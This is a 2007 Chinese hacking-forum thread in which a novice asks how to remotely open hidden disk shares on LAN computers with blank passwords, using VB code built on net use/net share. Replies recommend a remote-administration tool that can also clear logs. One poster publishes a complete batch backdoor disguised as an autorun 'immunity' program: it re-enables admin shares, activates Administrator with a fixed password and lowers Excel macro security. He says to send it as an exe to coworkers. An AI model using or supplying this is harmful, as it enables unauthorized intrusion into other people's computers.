[讨论]关于用VB编IPC利用工具的开启远程共享问题(问题更新于2007.9.9)请求帮助,谢谢!
议题作者:我是shange信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
各位高人,我是个新手,第一次发帖,,多多关照,,
情况是:局域网里,有空口令的电脑,有IPC$(没有默认的c$,d$,,admin$)现在我想给他开启隐藏的共享
我可以到计算机管理里面连接他开启,还可以为共享设置权限,但是到CMD中怎么实现呢,我百度了些,有很多说的不同,我迷茫了,
现在我正到用VB写一个这样的小工具
这里是开启共享部分的代码:
Private Sub open_Click()
Shell "net use \\" + ip + "\ipc$ ''/user:administrator", vbHide '与输入的IP建立IPC连接
If Checkc.Value = 1 Then '如果c盘的单选框被选中
Shell "net share c$=c:\", vbHide '那么就开启以c$为名的c盘共享
If Check7.Value = 1 Then '如果勾选了映射磁盘选项
Shell "net use zc: \\" + ip + "\c$", vbHide ‘'映射对方C盘到本地,名为zc
End If
End If
End Sub
但是这样好像都是把自己的盘共享了,并不能共享到你输入的IP的盘,(如果到计算机管理里面又可以开启共享的啊)是不是我的命令哪里有错误,或者大家能不能告诉小弟我下,怎么实现开启对方共享的功能啊,谢谢!!
[s:269] [s:269] [s:269] [s:269] [s:269] [s:269] [s:269]
大家帮帮小弟我吧,,再次谢谢!
更新问题:+++++++++
再顺便问下个小小问题:
1.关于输入命令时候,有些时候,看到别人首先输入 “cd / ”或者 输入两次“cd ..”
然后会车后,就变成了c:/> 为什么要这么做呢,,,(通过自己的智慧理解了,谢谢大家关注)
2.关于空口令主机,我在计算机管理里面连接后,打开了他的服务,比如 TELNET,但是,进入CMD模式下,却怎么一直没能连接呢,说 23端口连接失败,为何???望高手帮下我,谢谢!! 我觉得,既然图形模式下的计算机管理里面都能开启共享,那么命令下一定也会有办法的,可是,,,
牛人们,帮下我喔,,我百度的眼睛的发白了,, [s:270]
请查阅微软官方help系统。
net use的用法早就忘记了。 [s:266] 开他的telnet
然后net share [quote]引用第3楼sunwear于2007-09-04 09:27发表的 :
开他的telnet
然后net share[/quote]
可是,她都没有默认共享的嘛,什么共享都没的,也不能上传文件,看样子只有用欺骗的办法了噢,,,哎,,, 以前搞网吧的时候习惯用这个工具。不知道现在更新了没有。
记得以前是在焦点下的,刚找了下还有。
楼主试试
----------------------------------------------------------------------------
Recton.exe
提交时间:2004-11-22
提交用户:StarsunYzL
工具分类:其它工具
运行平台:Windows
工具大小:50688 Bytes
文件MD5 :e0db705722396ba6476945a0252ae85c
工具来源:★ 枫の子 ★
只要你有一远程主机的管理员密码,并且远程主机的135端口和WMI服务(默认启动)都开启,那么
你就可以通过这个小程序远程开3389,远程开/关telnet,远程运行CMD命令,远程清除所有日志,
远程重启、查/杀进程、查看/启动/停止服务、查看/创建共享等.不依赖远程主机的IPC是否开放.
----StarsunYzL [quote]引用第5楼ssspr于2007-09-04 20:51发表的 :
以前搞网吧的时候习惯用这个工具。不知道现在更新了没有。
记得以前是在焦点下的,刚找了下还有。
楼主试试
----------------------------------------------------------------------------
Recton.exe
.......[/quote]
我谢谢你啊
好像都不行呢,RPC服务不可用,,
是不是我用局域网扫描电脑后,都给所有的IPC主机建立了空连接的问题,,,CMD下,查看都连接着的,
明天再试一试,, 哪个工具根本就不行呢,, 我的做法是给他共享一个软件什么(或者发一个E_mail包含自己做的后门程序),在里面种植一个后门程序开启默认共享。以下是我利用autorun作的后门的代码:
@echo off
taskkill /im explorer.exe /f
taskkill /im qqpath.exe /f
echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "forceguest"=dword:00000000 >>1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] >>1.reg
echo "NoDriveTypeAutoRun"=dword:000000ff >>1.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >>1.reg
echo "NoDriveTypeAutoRun"=dword:000000ff >>1.reg
regedit /s 1.reg
del 1.reg
echo Windows Registry Editor Version 5.00 >2.reg
for %%a in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do @(
if exist %%a: (
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\network\lanman\%%a$] >>2.reg
echo "flags"=dword:00000302 >>2.reg
)
)
@regedit /s 2.reg
del 2.reg
for %%a in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do @(
if exist %%a:\nul (
net share %%a$=%%a:
)
)
net share admin$ /delete
net stop Server "y"
net start Server "y"
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
echo "AutoShareWks"=dword:00000001>> c:\delshare.reg
echo "AutoShareServer"=dword:00000001>> c:\delshare.reg
@regedit /s c:\delshare.reg
@del c:\delshare.reg
@echo Windows Registry Editor Version 5.00 >> c:\1.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security]>> c:\1.reg
@echo "Level"=dword:00000001>> c:\1.reg
@regedit /s c:\1.reg
@del c:\1.reg
@net user administrator /active:yes
@net user Administrator 000000
@del c:\windows\qqpath.exe /f /q /as
@mkdir c:\WINDOWS\qqpath.exe
@mkdir c:\WINDOWS\qqpath.exe\"病毒免疫勿删除../"
@attrib +h +r c:\WINDOWS\qqpath.exe
for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do @(
if exist %%a: (
@del %%a:\autorun.inf /f /q /as
@mkdir %%a:\autorun.inf
@mkdir %%a:\autorun.inf\"病毒免疫勿删除../"
@attrib +h +r %%a:\autorun.inf
)
)
@start explorer.exe
for %%a in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%a:\nul (
>c:\1.vbs echo msgbox^("%%a:免疫成功"^)
c:\1.vbs
)
)
del c:\1.vbs 局域网内,我一般用TELNET上去,顺便看看它的硬盘中有没有自己想要的,有再共享之,然后映射为自己的网络驱动器 [quote]引用第8楼benteng302于2007-09-07 13:38发表的 :
我的做法是给他共享一个软件什么(或者发一个E_mail包含自己做的后门程序),在里面种植一个后门程序开启默认共享。以下是我利用autorun作的后门的代码:
@echo off
taskkill /im explorer.exe /f
taskkill /im qqpath.exe /f
echo Windows Registry Editor Version 5.00 >1.reg
.......[/quote]
哦,,,小心提问下:
这个貌似是批处理程序,难道是把批处理文件放到共享的文件夹里,然后设置为隐藏共享,当别人一打开文件后就运行这个批处理》??是这样做嘛??
我是菜鸟,不好意思,, [quote]引用第9楼南海企鹅于2007-09-08 02:44发表的 :
局域网内,我一般用TELNET上去,顺便看看它的硬盘中有没有自己想要的,有再共享之,然后映射为自己的网络驱动器[/quote]
请教你一下,你是用什么方法开启TELNET的呢,可以给我说下思路不,谢谢你啊! [quote]引用第10楼我是shange于2007-09-10 21:17发表的 :
哦,,,小心提问下:
这个貌似是批处理程序,难道是把批处理文件放到共享的文件夹里,然后设置为隐藏共享,当别人一打开文件后就运行这个批处理》??是这样做嘛??
我是菜鸟,不好意思,,[/quote]
恩,这样也可以。还有次程序本来就可以作为Autorun.inf免疫程序,你可以把批处理转换为exe 给同事发过去,只要他已运行就打开了后门。 [quote]引用第12楼benteng302于2007-09-11 13:02发表的 :
恩,这样也可以。还有次程序本来就可以作为Autorun.inf免疫程序,你可以把批处理转换为exe 给同事发过去,只要他已运行就打开了后门。[/quote]
这个代码有些地方看不大懂,我到自己电脑上运行了一次,把默认共享开启了,
把Administrator的密码改了,,后门就是修改密码?感觉这样容易被发现,如果能隐藏添加个管理员,感觉还要好些,
大哥,能不能给些关键地方加个注释啊,不大懂就是不大懂啊,没的办法,,汗,[s:302][s:302][s:302][s:302][s:302]
比如,这里 : 可以不,??谢谢啊!
1.reg
@regedit /s 2.reg
del 2.reg
for %%a in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do @(
if exist %%a:\nul (
net share %%a$=%%a:
net start Server "y" (这里的server是什么服务啊?)
还有其他地方也有些不懂的,,,,哎,,
页:
[1]